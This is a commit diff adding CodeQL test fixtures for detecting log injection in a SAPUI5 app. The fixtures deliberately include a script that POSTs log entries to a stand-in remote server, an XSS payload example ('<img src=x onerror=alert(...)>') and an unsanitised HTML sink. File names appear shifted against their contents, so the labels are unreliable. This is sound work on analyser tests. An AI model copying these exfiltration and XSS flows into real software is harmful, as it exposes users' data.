Add unit test cases

Author: jeongsoolee09

javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-getLogEntries/package-lock.json

@@ -0,0 +1,5 @@
+{
+  "name": "sap-ui5-xss",
+  "version": "1.0.0",
+  "main": "index.js"
+}

javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-getLogEntries/package.json

@@ -0,0 +1,7 @@
+specVersion: '3.0'
+metadata:
+  name: sap-ui5-xss
+type: application
+framework:
+  name: SAPUI5
+  version: "1.115.0"

javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-getLogEntries/ui5.yaml

@@ -0,0 +1,22 @@
+sap.ui.define(
+  [
+    "sap/ui/core/mvc/Controller",
+    "sap/ui/model/json/JSONModel",
+  ],
+  function (Controller, JSONModel) {
+    "use strict";
+    return Controller.extend("codeql-sap-js.controller.app", {
+      onInit: function () {
+        var oData = {
+          input: null,
+          output: null,
+        };
+        var oModel = new JSONModel(oData);
+        this.getView().setModel(oModel);
+
+        var input = oModel.getProperty("/input");
+        jQuery.sap.log.debug(input); //log-injection sink
+      },
+    });
+  },
+);

javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-getLogEntries/webapp/controller/app.controller.js

@@ -0,0 +1,21 @@
+<!DOCTYPE html>
+<html>
+
+<head>
+
+    <meta charset="utf-8">
+    <title>SAPUI5 XSS</title>
+    <script src="https://sdk.openui5.org/resources/sap-ui-core.js" 
+        data-sap-ui-libs="sap.m"
+        data-sap-ui-onInit="module:codeql-sap-js/index" 
+        data-sap-ui-resourceroots='{
+            "codeql-sap-js": "./"
+        }'>
+        </script>
+</head>
+
+<body class="sapUiBody" id="content">
+
+</body>
+
+</html>

javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-getLogEntries/webapp/index.html

@@ -0,0 +1,11 @@
+sap.ui.define([
+    "sap/ui/core/mvc/XMLView"
+], function (XMLView) {
+    "use strict";
+    XMLView.create({
+        viewName: "codeql-sap-js.view.app"
+    }).then(function (oView) {
+        oView.placeAt("content");
+    });
+
+}); 

javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-getLogEntries/webapp/index.js

@@ -0,0 +1,5 @@
+{
+    "sap.app": {
+        "id": "sap-ui5-xss"
+    }
+}

javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-getLogEntries/webapp/manifest.json

@@ -0,0 +1,15 @@
+sap.ui.define(
+  ["sap/ui/base/Object", "sap/base/Log"],
+  function (BaseObject, Log) {
+    "use strict";
+    return BaseObject.extend("codeql-sap-js.log.CustomLogListener", {
+      constructor: function () {
+        let message = Log.getLogEntries()[0].message;
+        const http = new XMLHttpRequest();
+        const url = "https://some.remote.server/location";
+        http.open("POST", url);
+        http.send(message); // js/ui5-log-injection-to-http
+      },
+    });
+  },
+);

javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-getLogEntries/webapp/utils/LogEntriesToHttp.js

@@ -0,0 +1,9 @@
+<mvc:View controllerName="codeql-sap-js.controller.app"
+    xmlns="sap.m"
+    xmlns:core="sap.ui.core"
+    xmlns:mvc="sap.ui.core.mvc">
+    <Input placeholder="Enter Payload" 
+        description="Try: &lt;img src=x onerror=alert(&quot;XSS&quot;)&gt;" 
+        value="{/input}" />  <!--User input source sap.m.Input.value -->
+    <core:HTML content="{/output}"/> <!--XSS sink sap.ui.core.HTML.content -->
+</mvc:View>